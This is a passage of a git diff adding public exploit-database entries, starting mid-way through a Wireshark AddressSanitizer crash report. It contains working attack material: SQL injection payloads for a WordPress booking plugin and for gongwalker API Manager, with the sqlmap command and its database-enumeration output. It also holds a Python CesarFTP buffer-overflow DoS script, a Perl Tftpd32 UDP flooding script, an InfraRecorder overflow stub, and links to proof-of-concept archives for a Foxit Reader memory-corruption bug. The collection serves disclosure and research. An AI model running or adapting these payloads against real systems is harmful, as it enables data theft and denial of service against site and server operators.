0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #11 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #12 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #13 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8 + #14 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #15 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3 + #16 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #17 0x5264eb in process_packet wireshark/tshark.c:3728:5 + #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11 + #19 0x515daf in main wireshark/tshark.c:2197:13 + +SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/epan/dissectors/packet-ber.c:3990:17 in dissect_ber_constrained_bitstring +Shadow bytes around the buggy address: + 0x0ffbf6ac0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0ffbf6ac0f00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==6953==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11828. Attached are two files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39327.zip + diff --git a/platforms/php/webapps/39319.txt b/platforms/php/webapps/39319.txt new file mode 100755 index 000000000..c29bcd687 --- /dev/null +++ b/platforms/php/webapps/39319.txt @@ -0,0 +1,77 @@ +# Exploit Title: WordPress appointment-booking-calendar <=1.1.23 - Shortcode SQL injection +# Date: 2016-01-24 +# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/ +# Exploit Author: Joaquin Ramirez Martinez [i0 security-lab] +# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form +# Vendor: CodePeople.net +# Vebdor URI: http://codepeople.net +# Version: 1.1.23 +# OWASP Top10: A1-Injection +# Tested on: windows 10 + firefox + sqlmap 1.0. + +=================== +PRODUCT DESCRIPTION +=================== +"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in +a calendar**. The booking form is linked to a **PayPal** payment process. + +You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities +where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings +that can be accepted for each time-slot." + +(copy of readme file) + + +====================== +EXPLOITATION TECHNIQUE +====================== +remote + +============== +SEVERITY LEVEL +============== + +critical + +================================ +TECHNICAL DETAILS && DESCRIPTION +================================ + +A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.20. + +The flaw was found in the function to run when a shortcode is found within a page in the wordpress site. +The function mentioned use unsanitized attributes and a user authenticated as a editor, autor or +administrator (compromised) can exploit this vulnerability by adding crafted shortcodes on a page or post. + +The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, +an attacker can compromise the entire web server. + +================ +PROOF OF CONCEPT +================ + +An attacker(editor, autor or administrator) can embed into a post the following shortcode... + +[CPABC_APPOINTMENT_LIST calendar="-1 or sleep(10)#"] + +... and the post will take ten seconds loading. + +========== + CREDITS +========== + +Vulnerability discovered by: + Joaquin Ramirez Martinez [i0 security-lab] + strparser[at]gmail[dot]com + https://www.facebook.com/I0-security-lab-524954460988147/ + https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q + + +======== +TIMELINE +======== + +2016-01-08 vulnerability discovered +2016-01-24 reported to vendor +2016-01-25 released appointment-booking-calendar 1.1.24 +2016-01-26 full disclosure diff --git a/platforms/php/webapps/39320.txt b/platforms/php/webapps/39320.txt new file mode 100755 index 000000000..4ca78e77c --- /dev/null +++ b/platforms/php/webapps/39320.txt @@ -0,0 +1,48 @@ +gongwalker API Manager v1.1 - Blind SQL Injection + +# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection +# Date: 2016-01-25 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: https://github.com/gongwalker/ApiManager +# Software Link: https://github.com/gongwalker/ApiManager.git +# Version: v1.1 +# Tested on: Debian + +# =================== Vulnerability Description =================== # +Api Manager's index.php used tag parameters is vulnerable +http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1 + +# ========================= SqlMap Query ========================== # +sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag + +# ================= SqlMap Result(get My Test DB) ================= # +Parameter: tag (GET) + Type: boolean-based blind + Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) + Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb + + Type: AND/OR time-based blind + Title: MySQL > 5.0.11 AND time-based blind (SELECT) + Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF +--- +[21:14:21] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu +web application technology: Apache 2.4.10 +back-end DBMS: MySQL 5.0.11 +[21:14:21] [INFO] fetching database names +[21:14:21] [INFO] fetching number of databases +[21:14:21] [INFO] resumed: 25 +[21:14:21] [INFO] resumed: information_schema +[21:14:21] [INFO] resumed: " +[21:14:21] [INFO] resumed: "" +[21:14:21] [INFO] resumed: ' +[21:14:21] [INFO] resumed: '' +[21:14:21] [INFO] resumed: ''' +[21:14:21] [INFO] resumed: api +[21:14:21] [INFO] resumed: blackcat +[21:14:21] [INFO] resumed: edusec + +... + + diff --git a/platforms/windows/dos/39274.py b/platforms/windows/dos/39274.py new file mode 100755 index 000000000..2bac65a6e --- /dev/null +++ b/platforms/windows/dos/39274.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python +#-*- coding:utf-8 -*- +# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit +# Discovery by : Irving Aguilar +# Email : im.aguilar@protonmail.ch +# Discovery Date : 18.01.2016 +# Tested Version : 0.99g +# Vulnerability Type : Denial of Service (DoS) +# Tested on OS : Windows XP Professional SP3 x86 es + +import socket + + +buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20 +target = '192.168.1.73' +port = 21 + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect = s.connect((target, port)) +print '[*] Target: ' + target +print '[*] Port: ' + str(port) +s.recv(1024) + +s.send('USER ftp\r\n') +s.recv(1024) + +s.send('PASS ftp\r\n') +s.recv(1024) + +s.send( buffer + '\r\n') +print '[+] Buffer sent' +s.close() diff --git a/platforms/windows/dos/39329.py b/platforms/windows/dos/39329.py new file mode 100755 index 000000000..50ed23e86 --- /dev/null +++ b/platforms/windows/dos/39329.py @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/67076/info + +InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions. + +InfraRecorder 0.53 is vulnerable; other versions may also be affected. + +#!/usr/bin/python +# Exploit Title: InfraRecorder Unicode Buffer Overflow +# Version: version 0.53 +# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download +# Tested on: Windows XP sp2 +# Exploit Author: Osanda Malith +''' +We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address +you can build a successful exploit. +''' +''' +Click Edit -> Import -> import our buffer +''' +junk = "A"*262 +nseh = "BB" +seh = "CC" +junk2 = "D"*20000 +file=open("Exploit.m3u","w") +file.write(junk) +file.close() +#EOF diff --git a/platforms/windows/dos/39330.txt b/platforms/windows/dos/39330.txt new file mode 100755 index 000000000..4ec000e56 --- /dev/null +++ b/platforms/windows/dos/39330.txt @@ -0,0 +1,66 @@ +##################################################################################### + +Application: Foxit Reader PDF Parsing Memory Corruption + +Platforms: Windows + +Versions: 7.2.8.1124 and earlier + +Author: Francis Provencher of COSIG + +Website: http://www.protekresearchlab.com/ + +Twitter: @COSIG_ + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +=============== +1) Introduction +=============== + +Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing. + +(http://en.wikipedia.org/wiki/Foxit_Reader) + +##################################################################################### + +============================ +2) Report Timeline +============================ + +2015-12-18: Francis Provencher from Protek Research Lab’s found the issue; +2016-01-02: Foxit Security Response Team confirmed the issue; +2016-01-21: Foxit fixed the issue; +##################################################################################### + +============================ +3) Technical details +============================ + +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. + +User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. + +A specially crafted PDF can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability + +to execute arbitrary code under the context of the current process. + +##################################################################################### + +=========== + +4) POC + +=========== + +http://protekresearchlab.com/exploits/COSIG-2016-02.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39330.zip + +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39331.pl b/platforms/windows/dos/39331.pl new file mode 100755 index 000000000..3489ccb32 --- /dev/null +++ b/platforms/windows/dos/39331.pl @@ -0,0 +1,35 @@ +source: http://www.securityfocus.com/bid/67404/info + +Tftpd32 and Tftpd64 are prone to denial-of-service vulnerabilities. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed. + +The following products are vulnerable: + +Tftpd32 4.5 +Tftpd64 4.5 + +#!/usr/bin/perl -w + +use IO::Socket; + +for (my $j = 0; $j < 2; $j++) +{ + sleep(2); + for (my $i = 0; $i < 1500; $i++) + { + $st_socket = IO::Socket::INET->new(Proto=>'udp', +PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error"; + + $p_c_buffer = "\x0c\x0d" x 10; + + print $st_socket $p_c_buffer; + + close($st_socket); + + print "sent " . $i . "\n"; + } +} + +exit; +